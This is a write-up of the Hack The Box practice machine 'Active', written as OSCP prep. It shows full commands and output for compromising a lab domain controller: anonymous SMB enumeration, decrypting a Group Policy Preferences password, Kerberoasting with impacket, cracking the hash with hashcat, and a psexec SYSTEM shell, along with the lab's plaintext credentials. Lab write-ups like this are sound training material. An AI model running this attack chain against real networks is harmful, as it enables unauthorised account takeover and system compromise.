TJ_Null’s OSCP Prep – HTB – Active

This is a Active Directory box. Because of SMB null session, we found Group Policy Prefance encrypted password stored in cpassword. We decrypted that and got credentials for SVC_TGS. Using these credentials we kerberoasting technique to get hash for the user Administrator. I then cracked that hash, and used psexec to gain shell on the machine.


I’ll start with a NMAP scan.

└─# nmap -sC -sV -p- --min-rate 10000 -oN nmap.result
Starting Nmap 7.92 ( ) at 2022-01-22 21:18 EST
Nmap scan report for
Host is up (0.030s latency).
Not shown: 65512 closed tcp ports (reset)
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-01-23 02:20:32Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1m54s
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-01-23T02:21:29
|_  start_date: 2022-01-23T02:16:58

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 83.23 seconds

The services running on the machine is:

53DNSDomain name system. Translate IP to domain.
88KerberosKerberos is an authenticaiton protocol.
135RPCProtocol that uses the client-server model in order to allow one program to request service from a program on another computer.
139netbios-ssnNetwork Basic I/O system. Provides services related to the session layer.
389AD LDAPLightwegiht Directory Access Protocol. Protocol to locate organizations, individuals, and other resources such as files and devices in a network.
445microsoft-ds (SMB)Service Message Block. Application layer network protocol primarily used for offering shared access to files, printers, serial ports, etc
464kpasswd5?Used for chaning/setting passwords against Active Directory.
593ncacn_httpIdentifies IIS as the protocol family for the endpoint.
3268AD LDAPSame as port 389
5722msrpcsame as 135
9389mc-nmfMessage Framing protocol

Right off the bat we can note that the domain is active.htb.

I’ll start with listing shares that are available in SMB.

└─# smbclient -L //              
Enter WORKGROUP\root's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Enumerating the share Replication I found a XML file called Groups.xml.

└─# cat Groups.xml                                                                                                                                                                                                                      1 ⨯
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>

In that file we get a service user SVC_TGS and a group policy preferance encrypted password. Microsoft released the key for GPP encryption. Microsoft released a patch in 2014 preventing admins from putting passwords into GPP. The patch dosent do anything about passwords that were already available there.

Decrypting GPP password

└─# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ                                                                                   1 ⨯

So we have the credentials for the service account. SVC_TGS:GPPstillStandingStrong2k18.

From the earlier enumeration, I saw the share called Users. The user SVC_TGS have access to that share.

smb: \SVC_TGS\> ls
  .                                   D        0  Sat Jul 21 11:16:32 2018
  ..                                  D        0  Sat Jul 21 11:16:32 2018
  Contacts                            D        0  Sat Jul 21 11:14:11 2018
  Desktop                             D        0  Sat Jul 21 11:14:42 2018
  Downloads                           D        0  Sat Jul 21 11:14:23 2018
  Favorites                           D        0  Sat Jul 21 11:14:44 2018
  Links                               D        0  Sat Jul 21 11:14:57 2018
  My Documents                        D        0  Sat Jul 21 11:15:03 2018
  My Music                            D        0  Sat Jul 21 11:15:32 2018
  My Pictures                         D        0  Sat Jul 21 11:15:43 2018
  My Videos                           D        0  Sat Jul 21 11:15:53 2018
  Saved Games                         D        0  Sat Jul 21 11:16:12 2018
  Searches                            D        0  Sat Jul 21 11:16:24 2018

                5217023 blocks of size 4096. 277681 blocks available
smb: \SVC_TGS\> cd Desktop\
smb: \SVC_TGS\Desktop\> ls
  .                                   D        0  Sat Jul 21 11:14:42 2018
  ..                                  D        0  Sat Jul 21 11:14:42 2018
  user.txt                           AR       34  Sat Jan 22 21:17:47 2022

                5217023 blocks of size 4096. 277681 blocks available
smb: \SVC_TGS\Desktop\> get user.txt 
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \SVC_TGS\Desktop\> exit


To get the credentials for Administrator account I’ll use a technique called kerberoasting.

The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts. Thus, part of these TGS tickets are encrypted with keys derived from user passwords. As a consequence, their credentials could be cracked offline. You can know that a user account is being used as a service because the property “ServicePrincipalName” is not null.

Therefore, to perform Kerberoasting, only a domain account that can request for TGSs is necessary, which is anyone since no special privileges are required.

I’ll use impackets GetUserSPN. Pentestlab have a great blogpost about Service Principle Names

└─# impacket-GetUserSPNs -request -dc-ip active.htb/svc_tgs -outputfile hashes.kerberoast                                                                               1 ⨯ 1 ⚙
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2022-01-22 21:18:00.883745             

I’ll now attempt to crack the hash using hascat. Using hashcat on my host instead of Kali VM allowes me to use the GPU to crack the hash. Even though the hash is probably a password from rockyou, using hashcat with GPU is alot faster than using the CPU. GPU passthroug to VM with a consumer card is a hassle, so I havent done it.

C:\Users\AlaaG\OneDrive\Skrivebord\hashcat-6.2.4>hashcat -m 13100 --force -a 0 C:\Users\AlaaG\OneDrive\Skrivebord\hash.kerberoast.txt rockyou.txt                                   hashcat (v6.2.4) starting                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ====================                                                                                                                                                                * Device #1: NVIDIA GeForce RTX 3070 Laptop GPU, 7150/8191 MB, 40MCU                                                                                                                                                                                                                                                                                                    OpenCL API (OpenCL 3.0 CUDA 11.5.125) - Platform #1 [NVIDIA Corporation]                                                                                                            ========================================================================                                                                                                            * Device #2: NVIDIA GeForce RTX 3070 Laptop GPU, skipped                                                                                                                                                                                                                                                                                                                OpenCL API (OpenCL 2.1 AMD-APP (3224.5)) - Platform #2 [Advanced Micro Devices, Inc.]                                                                                               =====================================================================================                                                                                               * Device #3: AMD Radeon(TM) Graphics, 6624/13320 MB (4790 MB allocatable), 8MCU                                                                                                                                                                                                                                                                                         Minimum password length supported by kernel: 0                                                                                                                                      Maximum password length supported by kernel: 256                                                                                                                                                                                                                                                                                                                        Hashes: 1 digests; 1 unique digests, 1 unique salts                                                                                                                                 Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates                                                                                                        Rules: 1                                                                                                                                                                                                                                                                                                                                                                Optimizers applied:                                                                                                                                                                 * Zero-Byte                                                                                                                                                                         * Not-Iterated                                                                                                                                                                      * Single-Hash                                                                                                                                                                       * Single-Salt                                                                                                                                                                                                                                                                                                                                                           ATTENTION! Pure (unoptimized) backend kernels selected.                                                                                                                             Pure kernels can crack longer passwords, but drastically reduce performance.                                                                                                        If you want to switch to optimized kernels, append -O to your commandline.                                                                                                          See the above message to find out about the exact limits.                                                                                                                                                                                                                                                                                                               Watchdog: Temperature abort trigger set to 90c                                                                                                                                                                                                                                                                                                                          Host memory required for this attack: 421 MB                                                                                                                                                                                                                                                                                                                            Dictionary cache built:                                                                                                                                                             * Filename..: rockyou.txt                                                                                                                                                           * Passwords.: 14344391                                                                                                                                                              * Bytes.....: 139921497                                                                                                                                                             * Keyspace..: 14344384                                                                                                                                                              * Runtime...: 0 secs                                                                                                                                                                                                                                                                                                                                                    $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$037f289324d5c77c9f1847bf3606e6c6$d1462adf2fb2dd4f89fe5b86993cf73a78103bcdf3d72e5fd629c77005eb512d9bc3ca959e7efba7041b7dae4662f058845ee19e91db9fcb479d671cd60663c69df89e33bff176d803e1cae39378521d208e54df913b8c22cd59f884624626234dadc6aa0f9e6550a583553e78944d017ea871fb966c98d99e2eda0889199407bd462d5f9fae457d8dd5a0b2e686d471fdfe78f94878a0e7e0b5d869b4b17e8539248dd2d86a783064fbb959495de4cb8fd8d9c03fa1f51f4ce8bbd3dc994629823c9ebc3eab68849b05988dc025341eb03869744b193b192e0daffd0b88789b3692300870dc88fe7a08bd3dc86a46151499f90e14836bc2f8f11b93544668356fbdac21b04a0db6d8dedcadb26e03546c65c4ad458d1976996f1ab95390ab298fc0209142747b7ec436d9117cbbd07917ef3b7d864374d936d40b9f16a2716fc075c8000ee8cd8343ce78093f2a6f59175ced3be477df0e2a9624c7bc9838d24909bf7e9bedee33a8361f205a0a5fa6821e5049f4eeee7c65bac97300097e865d086fb241b3180c3cf56d9b3e922e74b499bd5f0a392a2ebdc346bf66e7ff18819243726a4ca926623598e0d7b30be58dcdc972a6143a8591beb22772c506249691be84d0a035194404d560f304cfa636cadb921f06f80747beb82f2f67c9edf37652ad23412e658c7944d72e74cd3994ca40ba454e4a6883ad96d0bcd76c0ec284288fffd7d77ae5c164905915d31fe469a11464154e85bd5bf57592cf49691cf8935d93e65c049821b2272e2352d374ae7c61b7d181af37dc841b8008f5acb79a90270b298fdbbae92a3f11004f4cf5917751820089a9ad99ac607b139cbd0ccb6188ad7fa913fe8b732bc525c34dfbd44b7e27e5aa17da80e635f4f150024489c6ad225144218de4629d9caadf462897c551d6fbbccf53265cb09af16ade88b7ffc323f4861345a459a32531540c0d12ea080ec1ba284a61ad394d7eacee26ddb2317b299c97604905844ef9f499b7263714f324ed7d2fc5328af703968c5f07a08dbd4da65051e887723124d2ca7f1156e9bf04a738fe763069b842f53e7a53206295103a069c4452d071b040908c18ad167842f0dfe48527ac7d7d80a0060fe361d9947b06ba736ec87b87f919536ed2a3cf398f6b3d0a9b45fb50c345b4995dc746ad0746360cbb5ff593800a82f226f1d05fc41fbd2ee10cb18b85702a3580d012a113ab89eb37da7ac85053448fdfc81d8f0c8b495c:Ticketmaster1968                                                                                                                                                                                                                                                                          Session..........: hashcat                                                                                                                                                          Status...........: Cracked                                                                                                                                                          Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)                                                                                                                            Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...8b495c                                                                                                     Time.Started.....: Sun Jan 23 20:22:15 2022, (2 secs)                                                                                                                               Time.Estimated...: Sun Jan 23 20:22:17 2022, (0 secs)                                                                                                                               Kernel.Feature...: Pure Kernel                                                                                                                                                      Guess.Base.......: File (rockyou.txt)                                                                                                                                               Guess.Queue......: 1/1 (100.00%)                                                                                                                                                    Speed.#1.........:  3187.8 kH/s (1.07ms) @ Accel:128 Loops:1 Thr:32 Vec:1                                                                                                           Speed.#3.........:  2506.8 kH/s (8.84ms) @ Accel:256 Loops:1 Thr:32 Vec:1                                                                                                           Speed.#*.........:  5694.6 kH/s                                                                                                                                                     Recovered........: 1/1 (100.00%) Digests                                                                                                                                            Progress.........: 10616832/14344384 (74.01%)                                                                                                                                       Rejected.........: 0/10616832 (0.00%)                                                                                                                                               Restore.Point....: 10190848/14344384 (71.04%)                                                                                                                                       Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1                                                                                                                               Restore.Sub.#3...: Salt:0 Amplifier:0-1 Iteration:0-1                                                                                                                               Candidate.Engine.: Device Generator                                                                                                                                                 Candidates.#1....: ace14325 -> TUGGAB8                                                                                                                                              Candidates.#3....: TUGGA00 -> Sabo2008                                                                                                                                              Hardware.Mon.#1..: Temp: 40c Util:  6% Core:1559MHz Mem:6994MHz Bus:8                                                                                                               Hardware.Mon.#3..: Util: 39% Core:2000MHz Mem:1600MHz Bus:16                                                                                                                                                                                                                                                                                                            Started: Sun Jan 23 20:21:41 2022                                                                                                                                                   Stopped: Sun Jan 23 20:22:18 2022                                                                                                                                                                                                                                                                                                                                              

We now have the credentials for the administrator account, Administrator:Ticketmaster1968. I can now fetch the root.txt from SMB share.

└─# smbclient // -U "active.htb\Administrator"                                                                                                                     1 ⨯ 1 ⚙
Enter ACTIVE.HTB\Administrator's password: 
Try "help" to get a list of possible commands.
smb: \Administrator\Desktop\> ls
  .                                  DR        0  Thu Jan 21 11:49:47 2021
  ..                                 DR        0  Thu Jan 21 11:49:47 2021
  desktop.ini                       AHS      282  Mon Jul 30 09:50:10 2018
  root.txt                           AR       34  Sat Jan 22 21:17:47 2022

                5217023 blocks of size 4096. 277665 blocks available
smb: \Administrator\Desktop\> get root.txt 
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)                                           


To get a shell on the machine I’ll use impackets psexec.

└─# impacket-psexec  active.htb/Administrator@                                                                                                                           1 ⨯ 1 ⚙
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on
[*] Found writable share ADMIN$
[*] Uploading file eUvcjiEp.exe
[*] Opening SVCManager on
[*] Creating service DzMt on
[*] Starting service DzMt.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system


What I’ve learned

  • Before 2014 AD machines could have GPP encrypted passwords “hidden” in a file.
  • When pentesting an Active Directory environment there might be many ports open. Enumerating the low hanging fruit is key, so not to get lost or spending huge ammount of time enumerating services that might not have anything usesful. That dosent however mean not to enumerate well.

Similar Posts